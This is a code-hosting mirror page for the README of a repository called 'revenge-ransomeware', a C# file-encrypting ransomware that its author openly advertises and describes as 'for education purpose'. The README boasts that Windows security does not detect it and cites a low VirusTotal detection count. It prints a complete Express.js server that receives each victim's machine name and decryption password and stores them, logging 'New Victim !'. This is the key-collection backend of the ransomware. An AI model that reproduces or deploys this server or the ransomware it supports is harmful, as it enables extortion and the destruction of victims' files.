Giter Site home page Giter Site logo

jojorand89 / revenge-ransomeware Goto Github PK

View Code? Open in Web Editor NEW

This project forked from revenge977/revenge-ransomeware

0.0 0.0 0.0 68 KB

a vigenere algorithm encrypt ransomeware created by me :p, for education purpose.

License: MIT License

C# 100.00%

revenge-ransomeware's Introduction

REVENGE RANSOMEWARE

a vigenere encrypt ransomeware created by me :p, for education purpose. MAKE SURE TO STAR THE REPOSITORY :)

Used Algorithm

  • Vigenere (which is strong algorithm)

DISCLAIMER

i didnt try this fully, so try it on virtual machine to make sure it works perfectly, If you encounter any problems tell me in issues also i created this only for education purposes, also windows security wont detect this ransomeware :)

Express Node.js Server (To Get The Password For Decrypt) Example:

const express = require("express");
const bodyParser = require("body-parser");
const fs = require("fs");
const app = express();

app.use(express.static(__dirname + "/public"));
app.use(bodyParser.json())
//url.com/new
app.post('/new', (req, res) => {
  var pcname = req.body.user;
  var password = req.body.pass;

  var createStream = fs.createWriteStream(`public/${pcname}.txt`);
  createStream.end();
  
  fs.writeFile(`./public/${pcname}.txt`, `password=${password}`, (err) => {
    if(err) return console.log(err);
    console.log("New Victim !")
  });
  res.send("done")
})

const listener = app.listen(3000, () => {
  console.log("Your app is listening on port 3000");
});
 

Detection

15/72 Virustotal Scan Result

virustotal

Change Log:

  • Now includes the decryption software :)

decryptsoftware

  • Now supports encrypting folders .

revenge-ransomeware's People

Contributors

revenge977 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.